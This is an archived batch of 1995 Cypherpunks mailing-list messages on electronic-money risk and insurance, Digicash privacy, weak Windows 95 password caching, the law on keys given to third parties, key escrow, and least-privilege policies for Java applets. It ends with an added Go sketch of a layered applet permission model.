> > 	The risk in question is not infinite-cost. If the person who gets
> > ahold of the keys starts simply making lots and lots of money, in a free
> > market the prices in digital cash for everything will start going up. This
> > phenomenon will be spotted, and those taking the particular variety in
> > question will stop accepting it. Losses are limited to however much was out
> > there at a given time, and if there are multiple systems with free-market
> > interconversion between them, that may not be very much. People will move
> > out of a decaying monetary system if: A. the new system is as easy to get
> > as the old; and B. the new system is as easy to spend as the old.
> > 	If the person who gets the keys simply uses them on a small scale,
> > then the resulting inflation and loss of value can simply be dealt with
> > using the discount mechanism. It's no longer infinite risk.
>
> Basically, the criminal in this scenario has a choice between greed and
> vandalism.  If he's motivated by greed, and he's clever, he'll push
> things slowly in the inflationary direction, as you describe.  If he's a
> vandal or terrorist at heart, however, he might get more satisfaction
> out of generating the equivalent of overnight inflation at the
> billion-percent level.  That's not a decaying monetary system, it's a
> suddenly-collapsing monetary system.   The only difference between those
> two scenarios is the quantity of bad money the criminal chooses to print
> and distribute.  (Note that this is very different from physical
> counterfeiting, where the logistics of actually feeding trillions of
> dollars into the money supply are quite daunting, and make the
> catastrophic-vandal scenario more or less impossible.)

A few rambling thoughts on the same subject:

I see a couple of risks that a potential customer would consider (akin to the
risks of owning a real-world exotic currency):

1. The risk that she'll accumulate some electronic money and won't be able to
exchange it conveniently for something else (goods, services, other forms of
money).

Imagine holding a quantity of central-african francs or belarusian zaichiks in
a rural area in American Midwest. This currency may be worth a lot in some
geographical areas (like New York City), but no bank will take it in the
accursed fly-over :). (Someone I know brought back some sheqels from a trip to
Israel and had lots of trouble finding a bank willing to exchange those for US
dollars.) Likewise if your Internet connection suddenly goes under, you may
not be able to trade your electronic cash until it's restored.

2. The risk that the electronic money will lose its value, e.g., because
someone issues a lot of it. In real life, this is comparable to the situation
where you own, e.g., a pile of Mexican pesos, and the government of Mexico decides
to print a lot of pesos, while changing the exchange rate so now you can get
more pesos for a dollar than you could when you got your original pile. Hence,
your pile is worth fewer dollars than it did before.

In real world, gold, silver, beads, fishhooks, whale teeth, whiskey, seashells,
cigarettes have all been used as money (medium of exchange / store of value)
because the users could be certain of their scarcity. There's the risk that
someone will find a way to forge electronic money so its exchange rate will
fall.

I see an entrepreneurial opportunity in these risks. I'm not necessarily going
to do it myself, but perhaps someone will find this idea useful.

First, let us recall how in real life currency owners limit their risks by
hedging. A most common hedge is an option. Let's suppose that I hold $1M worth
of DEMs, and can currently readily exchange them for USDs at, say, 1.40. I
enter into a contract with, say, my good friend Alexplore, specifying 2 things:

1. I now pay Alexplore $1,000 (Hey, I'm making this up!!!)
2. At any time during the next 3 months I can give Alexplore my DEM's and he'll
give me back USD's at, say, 1.35. (Of course, the contract specifies the
maximum amount of DEM's I can force him to buy from me.)

If the exchange rate never falls below 1.35 during the 3 months, I let the
option expire and Alexplore keeps the money; my loss of $1000 is his gain. If
the exchange rate does fall below 1.35, I'll probably exercise the option. My
loss is limited to the change from 1.40 to 1.45; any further loss is
Alexplore's (partially offset by the $1000). Alexplore is betting that the
exchange rate won't hit 1.35; I'm just limiting my potential losses.

In effect, Alexplore had sold me an insurance policy with a small deductible.
Another example familiar to most people is insuring one's car or a house.
Suppose I own a house worth $200,000 (we actually don't) and buy a fire
insurance for $1000. If the house doesn't burn down within a year, the
insurance premium is my loss and the insurer's profit. If it does burn down,
I probably have a claim against the insurer.

Of course, there's an additional small risk that the insurance company will
go under or renege on the contract. Moreover, the insurer can insist that,
e.g., the house be inspected for fire code violations before the policy goes
into effect.

How then can this insurance of assets be emulated with electronic money? Well,
an individual or an organization X that's fairly confident that electronic
money is "safe" could offer the following contract: a money-holder Y pays
X a sum of real or electronic money. During a fixed period of time Y may
choose to ask X to exchange some electronic money (up to a maximum amount
based on the initial payment) for real money at an agreed-upon discounted rate.

For example, Y might pay X $10 for the right to ask X to accept up to $1000 of
(dollar-denominated) electronic money at the rate of 90c of "real" money per
electronic dollar. The exchange rate is discounted so Y won't choose to
exercise the option until there's a real problem with the money (a deductible
of sorts); and the payment required to insure a certain amount of electronic
money is negotiated based on X's and Y's perceptions of the risks involved. If
electronic money works as well as many of us hope it will, then X just made $10
for nothing. But if the money goes bad, then X has assumed most of Y's risk.

X may impose security conditions on Y; e.g., only insure the money that was
received using an X-approved encryption.

For added assurance, X should be independent from the organizations that now
issue electronic money. X also has to convince Y's that he has the resources to
satisfy the claims if the shit hits the fan. Keep in mind that X assumes a
tremendous liability and hopes never to pay up. In the 80's many elderly
investors essentially insured others against a sharp drop in the market.
They were badly hurt during the crashes of 87 and 89.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@delhi.CS.Berkeley.EDU (David A Wagner)
Date: Thu, 7 Dec 95 16:17:58 PST
To: cypherpunks@toad.com
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512080017.TAA23185@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just a clarification about my comments on privacy against eavesdroppers
with Digicash.  I admit I didn't express myself very well the first time.

In article <199512071610.KAA16536@admin.starnet.net>,
Mark Twain Ecash Support <support@marktwain.com> wrote:
> 
> >Worse still, anonymity for the shop is worse with Digicash than with real
> >cash.  If I pay you real cash on a secluded street, you're fairly anonymous.
> >If I pay you Digicash over the Internet, any passive eavesdropper could be
> >recording your identy and the whole transaction.  Blech.
> 
> This is raising an issue that has nothing to do with Ecash. The complaint is
> in fact about the lack of a gereral link encryption on the Internet. I agree
> that this is needed, but providing it really isn't Ecash's job. I am eagerly
> anticipating the general use of IPSEC.
> 

Hrm, I think you misunderstood what I was trying to say.

Assume the attacker is not doing any traffic analysis.  The problem is
that even then, the shop's identity (and product info, and payment amount,
and bank ID, etc.) are still sent *in the clear* in the Digicash payment
protocol.  Thus all those items can be correlated to the payee's identity:
a complete loss of privacy for the shop.

There's no need to send that payment info in the clear -- why not encrypt?

If it is encrypted, a passive eavesdropper can only learn the payer's &
payee's identity if he uses traffic analysis, and even then he doesn't
know the payment amount, product description, etc.  For all he knows, the
transaction could've been a $0.01 cent donation to Sameer for his anonymous
remailer, or it could've been a $10,000 transfer to Sameer's machine in
(virtual) Anguila-space for a few dozen Apache servers.

(So this also has implications for payer anonymity & privacy, not just
payee privacy.  When payment info is sent in the clear, and the eavesdropper
is doing traffic analysis (e.g. by sniffing the link out from a small
business), the eavesdropper can correlate payer's identity with the
payment amount, product description, and other buying habit information.
When Digicash protocol messages are encrypted, this information isn't
released, and can't be correlated with payer identity, even when traffic
analysis is being done.)

That's why I really wish Digicash were encrypting all its messages.

And I'm very glad to hear that Digicash will support sending the entire
protocol over a SSL-protected link.  Great feature!  I'll be looking
forward to it.



> >* continue specifying the protocol at a deeper level, like you promised
> >  (and throw in source for security-critical modules too, eh? :-)
> 
> Writing all this down takes time. DigiCash may hire a tech writer soon. That
> should improve communications between all parties.

Excellent!

Thanks for all you're doing to improve Digicash's anonymity, privacy,
and security features, Lucky.  I think it's really important to get
this right in the pioneering work...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMeEBCoZzwIn1bdtAQFzYAF/agJtA7eal+rEP0ki34FY/vyKc/EDqJ0p
QR1T+zJZ0tn6i1hwluqlmvigJpWNst41
=/NJW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 7 Dec 95 19:31:26 PST
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Micro$oft and Java
In-Reply-To: <199512080205.SAA02898@mail.eskimo.com>
Message-ID: <Pine.ULT.3.91.951207190400.15814G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Joel McNamara wrote:

> I was at the Microsoft presentation.  Crypto-relevant info:
> 
> A patch will be published in the next few days to address the weak .PWL
> encryption.  I got a rather lame excuse about how the encryption was first
> implemented in 1991, and how it was sufficient then.  They will supposedly
> be changing the seed.

I do believe the word "lame" is in order, yes.

Microsoft has issued a public statement on the "issue" at 
http://www.microsoft.com/windows/pr/password.htm

As usual, the inaccuracies begin with the first sentence. Password caching
is not optional. It is on by default. Instructions for turning it off are
not even included with the floppy disk or OEM versions of Win95, and
they're not easy to find in the Resource Kit help file on the install CD,
which is neither installed nor referenced by default. 

Some rather astute people spent days looking for a way to disable password 
caching, and they couldn't find it. Their messages are on my list archive.

There is currently *no way* for the administrator of a public Windows 95 
lab to have any confidence that password caching has been turned off. All 
it takes is one malicious user -- or one innocent user who wants to 
disable system policies for other reasons -- and all passwords used from 
that machine are compromised.

We started whining about this on November 1; see 
gopher://quixote.stanford.edu/1m/win95netbugs.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 7 Dec 95 11:24:01 PST
To: cypherpunks@toad.com
Subject: Re: FW: websurfer 4.6
Message-ID: <199512071919.UAA12598@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On  7 Dec 95 at 18:06, Enzo Michelangeli wrote:

> On Sat, 2 Dec 1995, Michael Froomkin wrote:
> 
> > so much for compatibility....guess I'm sticking with netscape 
> > for now.
> 
> These guys at Netmanage's support seem to confuse Trumpet's 
> version number with the Winsock version... Trumpet 2.0b (as, 
> AFAIK, any other Winsock package presently available) is 
> Winsock 1.1 compliant. 

Not surprising. They confuse random doodling with software, too.

The real problem with NetManage is a severe case of brain death.
The Sampler TCP/IP sucks, the paid-up TCP/IP is so-so, but of 
the clients, only ftp is fair, and the rest bite. All the
NetManage clients I've tried crater, Mail can't rebuild its
index structures if they are corrupted (uh, what was it that 
rebuild was supposed to do, Harvey?), the version of WebSurfer
I evaluated took longer and longer to load and shut down, 
revealed on inspection to be due to loading/storing a very wordy 
global history in its, ahem, config file! Delete it and your 
config is gone. 

I wouldn't concern myself with what crypto is or isn't in a 
NetManage product -- they are not players as far as I'm 
concerned. They've been riding the wave of their TCP/IP not 
crashing as often as some others, but otherwise they're vacuum 
packed, untouched by coherent human thought.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Dec 95 19:17:54 PST
To: cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house?
Message-ID: <acecee610a021004a5f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:27 AM 12/8/95, sameer wrote:
>> > You mean if you give me your key the police can get it from me without a
>> > warrant? What if I don't want to give it up, and you don't? How would the
>> > police get it without a warrant?
>>
>> Yes.  Unless it could be shown that there was an expectation of privacy
>> in the transfer, or that there was an understanding that you intended this
>> to be a confidential matter.  Or in the alternative, that the
>
>        I do not understand.
>
>Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
>Bob "I want Alice's key, you need to give it to me. I don't have a
>warrant."
>
>How is this different from
>Bob has key. Cop wants Bob's key. Cop tells Bob "I want your key,
>you need to give it to me. I don't have a warrant."
>
>
>        sheesh, what a fucked up legal system.
                        ^^^^^^^^^

EXON WARNING! This message has just exposed the author, the toad.com
system, and all those who pass it on to fines of not less than $10,000!

But I share Sameer's confusion. If cops show up at my door, they must, it
seems to me, present proper warrants before they can _enter_ my premises,
or _search_ my premises. Something given to me, whether a letter, a key, a
photo, etc., is essentially *my property* and may not simply be taken away
from without due process.

I hope Black Unicorn is incorrect in his point.

--Tim

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 7 Dec 95 17:48:04 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <acecb41c02021004f4ed@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951207204325.27209I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


If Alice gives Bob her key and Bob is not a person with whom Alice has a 
special relationship of trust (e.g. her lawyer), then Alice has no legal 
grounds to complain if Bob *voluntarily* gives Carol, a Cop, Alice's 
key.

If Alice gives Bob her key and Bob is not a person with whom Alice has a 
special relationship of trust (e.g. her lawyer), then Alice has no legal 
grounds to complain if Carol, a Cop, serves Bob with a valid warrant to 
seize Alice's key and in fact does so.  

Furthermore, there are circumstances in some states where even if there 
is a special relationship of trust Bob either may at his discretion or in 
some rarer cases may be forced to divulge the key.  E.g. to prevent a 
crime that is about to be committed likely to involve loss of life.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 7 Dec 95 20:54:05 PST
To: cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <199512080227.SAA15534@infinity.c2.org>
Message-ID: <30C7C407.4117@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Thu, 7 Dec 1995, sameer wrote:
> 
> > > > You mean if you give me your key the police can get it from me without a
> > > > warrant? What if I don't want to give it up, and you don't? How would the
> > > > police get it without a warrant?
> > >
> > > Yes.  Unless it could be shown that there was an expectation of privacy
> > > in the transfer, or that there was an understanding that you intended this
> > > to be a confidential matter.  Or in the alternative, that the
> >
> >       I do not understand.
> >
> > Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
> > Bob "I want Alice's key, you need to give it to me. I don't have a
> > warrant."
> >
> > How is this different from
> > Bob has key. Cop wants Bob's key. Cop tells Bob "I want your key,
> > you need to give it to me. I don't have a warrant."
> 
> The real concern is this:
> 
> Bob gives his key to Alice.
> 
> The cops walk into Alice's place and 'convince' Alice to turn the key
> over without a warrant.  Perhaps Alice is more susceptible to
> persuasion because of some external reasons.  Alice does, Bob has no privacy
> interest in the key, Bob can no longer argue that it is protected under
> the 4th amendment.
> 
> Now let's get more sinister.
> 
> The cops mysteriously 'find' the key somewhere without a warrant.
> Bob cannot argue that the key should be suppressed on the basis of the
> 4th amendment because he gave it to Alice, and thus clearly it's not
> information he was interested in protecting.  (This is assuming the cops
> didn't violate other areas, or break into a house or something, or that
> if they did, that the court will find out about it).

  How about if Bob had a contractual agreement with Alice to keep his
key secret?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 7 Dec 95 18:16:24 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <acecb41c02021004f4ed@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951207202351.6540B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Timothy C. May wrote:

> At 9:27 PM 12/7/95, cme@acm.org wrote:
> 
> >It could be even worse.  I was on a panel last year with Scott Charney (sp?)
> >(I believe from DoJ) during which he commented that if you give your secret
> >key to anyone -- e.g., your own company -- then you have given up the
> >presumption of privacy.  That leaves the police open to get that secret
> >without a warrant.  This claim should be checked by a real lawyer.
> 
> Huh?
> 
> You mean if you give me your key the police can get it from me without a
> warrant? What if I don't want to give it up, and you don't? How would the
> police get it without a warrant?

Yes.  Unless it could be shown that there was an expectation of privacy 
in the transfer, or that there was an understanding that you intended this 
to be a confidential matter.  Or in the alternative, that the 
relationship between you and the third party is suggestive of such a 
confidence on its face.  Remember this is an ex post ruling.  The police 
will just come in and take the information, you have to fight it AFTER 
the fact.  It sounds fine in e-mail to ask the question "How will they 
get in" but in real life it becomes a much less realistic proposition.
 
> (And "I" could be your employer, so the point is clear.)

Yes.  I have seen holdings which indicate that information given to an 
employer, where there was no obvious expectation that it be kept 
confidential, estopped 4th amendment protections to its introduction when 
obtained without a warrant.

> And even more strikingly, what if you give your private key to your lawyer
> for safekeeping? Has attorney-client privilege gone away?

Hardly.  See above.  It hinges on the nature of the relationship and how 
it bears on the expectation of privacy.  The supreme court has ruled that 
the relationship with the phone company does not meet such a standard, 
and one can assume ISP's apply the same way.  I could go on spilling out 
holdings if there is enough interest.

> (Granted, there are ways to break attorney-client privilege, but these are
> rare exceptions. In any case, the police could not get the private key
> without a court order, warrant, whatever.)

Again, because of the nature of the relationship.  There is an 
expectation that a conversation with an attorney is one of the most 
private exchanges you can engage in.  As for rare exceptions, I'm not so 
sure I would term them rare.

> I can believe that some cases of giving up keys wipes out one's arguments
> based strictly on "privacy," but not that it wipes out other arguments.

It essentially prevents you from claiming you really had a demonstrated 
privacy interest in it, unless there are other circumstances to indicate 
such an interest.  Think of the court as saying "How the hell is this 
private if you told maggy and fred?"

> It seems to me that if one wants to voluntarily escrow private keys, for
> safekeeping, one's personal lawyer is a safe bet: it is very difficult to
> break this kind of attorney-client confidentiality, from what I know of
> such things.

I don't know where you came up with the lawyer example.  I don't know 
that anyone was claiming that one could break the attorney client trust 
on this basis.  However, I think, as a tangential matter, a court will 
examine very closely a claim that keys protected by such a trust can not 
be used as evidence.  To hold this so broadly would be to tell the 
criminal he merely needs to give the weapon used in a crime to his 
attorney to prevent its introduction.

You also need to make a distinction between a 4th amendment matter (which 
is the issue at hand) and the separate and distinct protection of the 
attorney client relationship.

"A person has no legitimate expectation of privacy in information he 
voluntarily turns over to third parties."  _Smith v. Maryland_, 442 U.S. 
735 (1979); _California v. Greenwood_, 486 U.S. 35 (citing Smith) (1988).

> --Tim May
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 7 Dec 95 18:49:03 PST
To: sameer <sameer@c2.org>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <199512080227.SAA15534@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951207214329.6540D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, sameer wrote:

> > > You mean if you give me your key the police can get it from me without a
> > > warrant? What if I don't want to give it up, and you don't? How would the
> > > police get it without a warrant?
> > 
> > Yes.  Unless it could be shown that there was an expectation of privacy 
> > in the transfer, or that there was an understanding that you intended this 
> > to be a confidential matter.  Or in the alternative, that the 
> 
> 	I do not understand.
> 
> Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
> Bob "I want Alice's key, you need to give it to me. I don't have a
> warrant."
> 
> How is this different from
> Bob has key. Cop wants Bob's key. Cop tells Bob "I want your key,
> you need to give it to me. I don't have a warrant."

The real concern is this:

Bob gives his key to Alice.

The cops walk into Alice's place and 'convince' Alice to turn the key 
over without a warrant.  Perhaps Alice is more susceptible to 
persuasion because of some external reasons.  Alice does, Bob has no privacy
interest in the key, Bob can no longer argue that it is protected under 
the 4th amendment.

Now let's get more sinister.

The cops mysteriously 'find' the key somewhere without a warrant.
Bob cannot argue that the key should be suppressed on the basis of the 
4th amendment because he gave it to Alice, and thus clearly it's not 
information he was interested in protecting.  (This is assuming the cops 
didn't violate other areas, or break into a house or something, or that 
if they did, that the court will find out about it).

That's the rationale.

> 	sheesh, what a fucked up legal system.

Indeed.

> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 7 Dec 95 19:06:12 PST
To: cypherpunks@toad.com
Subject: GAK solutions was: Is there a lawyer in the house?
Message-ID: <79623.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Thu, 7 Dec 95 16:27:23 EST, cme@acm.org  writes:
> It could be even worse.  I was on a panel last year with Scott Charney
> (sp?) (I believe from DoJ) during which he commented that if you give
> your secret key to anyone -- e.g., your own company -- then you have
> given up the presumption of privacy.

Interesting. At the NIST meeting, criteria #5 deals with decrypting
a conversation with only the key from one end.

I thought that would be hard to implement. But during the discussion,
they called on Miles Smid [sp?] who was obviously a NIST employee/consultant
with real knowledge. He suggested that you could encrypt the
session key with the public key of both parties, and send it along.
This would allow single ended GAK.

This is not far from the idea that CME proposed that the NSA/FBI/CIA
publish public keys, and we'll hack a voluntary version of PGP that
encrypts the session key with the LEA public key -- instant
voluntary Key Escrow.

Miles Smid's idea seemed reasonable, until you realize that he intends
you to escrow your private key...

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 7 Dec 95 19:06:06 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Java musings
Message-ID: <199512080311.WAA02282@homeport.org>
MIME-Version: 1.0
Content-Type: text



Some musings on policies, threats and liabilities of Java, Livescript
and other downloadable applets.

I. Policies.

	The recent Livescript problem was predictable.  Building an
execution environment to safely handle all the myriad of tricks that
programmers will throw at it is not a simple or easy task.  People
will make mistakes in the design and execution of these environments.  

	Right now, many people are chasing the idea of applets; it's
neat, sexy, and everyone wants in.  But, for many users, and many
environments, certain capabilities may be inappropriate.

	There has already been loud complaining in many forums about
the lack of site configurable Certification authorities, lack of site
control over Java features.  A site needs to be able to decide who to
trust, and who should be able to make these decisions, in a manner
that a user can not easily override.  The ease of configuration of
trust parameters in Netscape is neat for personal use, but
inappropriate for business.  When Java gets its ability to check
signatures, expect complaints about lack of site configuration of
trust hierarchies. (Yes, as opposed to web of trust.  As a bank, I
want to be able to control what code can run with a very explicit
hierarchy.)

	All applets are not created equal.

	All user requirements are not equal.

	Applets are not created equal.  Some are created in house to
do certain things, like watch the price of two stocks relative to one
another.  If an applet is created in house, signed off on by the
InfoSec people, then there's no reason (assuming strong integrity
checking) to deny it access to local disk, arbitrary network access,
etc.

	However, for various reasons (notably compartmentalization,
aka defense in depth), it is desirable to restrict disk (and possibly
network) access to certain addresses.  Something akin to chroot(),
tagging of packets outside the applications control to make firewall
filtering easy, filtering of available addresses to send to (only talk
on local subnet).  The ability to assign various levels of privilege
to code that runs on a virtual machine will be essential.  The ability
to limit these privileges must be reserved in some way to those with
site security responsibilities.   The security people, in turn, will
need the ability to delegate.

	This can perhaps be provided based on a least trusted basis.
Code starts out in a small, tight environment, with no access to
anything other than the (protected) processor, and a promote()
function which does authorization checking before granting new levels
of privileges in certain areas.

	Access to disk, access to local and remote network services,
and the ability to pull the browser to a new URL are all privileges
that should be orthogonally configurable, by site, by machine, or by
applet.

	All user requirements are not equal.

	This should be obvious.  Not all users need Java or
Livescript.  If a user is using Netscape to look at man pages, access
to Java and livescript is not very important.  Access to unsigned Java
applets may or may not meet the site security policy.  At home, I
might happily look at them.  In the office, I might have a very
different approach.

	A bank teller might need access to applets developed by the
bank for various things, but not need access to anything over the
internet.  He would need to be able to access the local lan servers.

	The need of users to get to different resources, and work
under different levels of protection calls out for mandatory strong
authentication in applets.  In other words, a better design might be to
only execute applets with some (verified) signature attached to them.

	The language in which the applet was written is important.
More important is the ability of users and management to set policies,
and see those policies enforced by applications.  I could then set my
browser only to run Livescripts signed by someone I know (or an agency
that vets them for bugs), and only run Java with minimal trust in the
absence of signatures.



II.  Threats and liabilities


	A malicious applet, running amok on a machine, with the same
disk & network access as a user, can send off to the world anything it
thinks interesting.  However, there are times when letting an applet
at certain files, or giving it heavy network access, might be very
useful.

	I'll take as an example Andersen Consulting's demo
BargainFinder (http://bf.cstar.ac.com/bf/).  BargainFinder is a way to
search 9 music stores on the web for an album, with one form.  3 of
the stores are blocking the searches. In addition, a cypherpunk might
wonder if the searches and their origins are being logged.

	That's not very useful for those of us who look forward to
perfect marketplace information for consumer goods.  Let me sketch
BargainFinder2, as powered by Java.  Instead of going to Andersen for
the page, you download BF to your local machine.  It does the
searching, same as BF1 did, but with no blocking possible.  You find
your CD at the best price.  Perhaps BF is rental-ware, perhaps it's
someone advertising their Java coding skills.

	But it's clear that this applet needs to be able to access the
network freely.  It's also plain that it won't be written for 6
platforms.  It might be written for Windows, but the Java market might
be larger still, and thus more attractive.  (Not to mention that the
network interface is mostly taken care of.  No Winsock version
worries.)

	Other applets, say an Ecash wallet manager that interfaces with
Quicken, need access to your local disk, and need to be able to
respond to incoming network queries from shops.

	Granular control of the access that applets have thus seems to
be needed.  Making Java 'secure' is not enough, because people will
'turn off' all the security to make one applet work.

	It might also be interesting to consider automatically
updating software, that can replace itself from time to time, after
verifying that a signature is correct.  Although, that does raise the
value of stealing a key from some well known, trusted applet vendor.

	To summarize, 'security' in the vague sense that Java
promises, while useful, needs granularity to allow it to fulfill its
potential.

	Comments are welcome.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume
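
One way to model the layered, least-trust policy sketched in the message above, as an added Go example that is not part of the original post: site, machine and user ceilings are ANDed together, and an applet gains privileges only through Promote. The type names, the signer and admin names and the TellerSandbox scenario are hypothetical, and signature verification is assumed to have happened before Applet.Signer is set.

```go
package main

import (
	"errors"
	"fmt"
)

// Privilege is a bit set, so each capability is granted or withheld on its own.
type Privilege uint8

const (
	Disk      Privilege = 1 << iota // local file access
	LocalNet                        // hosts on the local subnet
	RemoteNet                       // arbitrary Internet hosts
	Navigate                        // pull the browser to a new URL
	All       = Disk | LocalNet | RemoteNet | Navigate
)

var ErrDenied = errors.New("denied by site policy")

// Site is the part of the policy that only security staff can change.
type Site struct {
	signers   map[string]Privilege // ceiling per trusted signer
	unsigned  Privilege            // ceiling for unsigned or unknown-signer code
	delegates map[string]Privilege // most each delegated admin may hand out
}

func NewSite() *Site {
	return &Site{signers: map[string]Privilege{}, delegates: map[string]Privilege{}}
}

// Delegate hands an admin a bounded share of the security staff's authority.
func (s *Site) Delegate(admin string, limit Privilege) { s.delegates[admin] = limit }

// TrustSigner registers a signer on an admin's authority and refuses any
// privilege bit that was not delegated to that admin.
func (s *Site) TrustSigner(admin, signer string, p Privilege) error {
	if over := p &^ s.delegates[admin]; over != 0 {
		return fmt.Errorf("%w: %s cannot hand out %04b", ErrDenied, admin, over)
	}
	s.signers[signer] = p
	return nil
}

// Sandbox stacks the layers: machine and user settings are ANDed with the
// site ceiling, so they can narrow it but never widen it.
type Sandbox struct {
	Site    *Site
	Machine Privilege // per-workstation ceiling
	User    Privilege // the user's own preference
}

// Applet starts with nothing granted. Signer is the identity taken from an
// already verified signature, or "" when there is none (assumption: the
// verification itself happens elsewhere).
type Applet struct {
	Name    string
	Signer  string
	granted Privilege
}

func (sb *Sandbox) ceiling(a *Applet) Privilege {
	c := sb.Site.unsigned
	if p, ok := sb.Site.signers[a.Signer]; ok && a.Signer != "" {
		c = p
	}
	return c & sb.Machine & sb.User
}

// Promote is the only way to gain a privilege; a request is granted whole or
// not at all.
func (sb *Sandbox) Promote(a *Applet, want Privilege) error {
	if over := want &^ sb.ceiling(a); over != 0 {
		return fmt.Errorf("%w: %s refused %04b", ErrDenied, a.Name, over)
	}
	a.granted |= want
	return nil
}

func (a *Applet) Can(p Privilege) bool { return a.granted&p == p }

// TellerSandbox models the bank-teller workstation from the post: in-house
// code is fully trusted by the site, but this machine never reaches the Internet.
func TellerSandbox() *Sandbox {
	site := NewSite()
	site.Delegate("infosec", All)
	site.Delegate("branch-admin", Disk|LocalNet)
	if err := site.TrustSigner("infosec", "bank-infosec", All); err != nil {
		panic(err)
	}
	return &Sandbox{Site: site, Machine: Disk | LocalNet, User: All}
}

func main() {
	sb := TellerSandbox()
	inHouse := &Applet{Name: "stock-watch", Signer: "bank-infosec"}
	fmt.Println("in-house, disk+LAN:", sb.Promote(inHouse, Disk|LocalNet))
	fmt.Println("in-house, Internet:", sb.Promote(inHouse, RemoteNet))
	stray := &Applet{Name: "unsigned-demo"}
	fmt.Println("unsigned, navigate:", sb.Promote(stray, Navigate))
	fmt.Println("admin overreach:", sb.Site.TrustSigner("branch-admin", "vendor", RemoteNet))
}
```
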




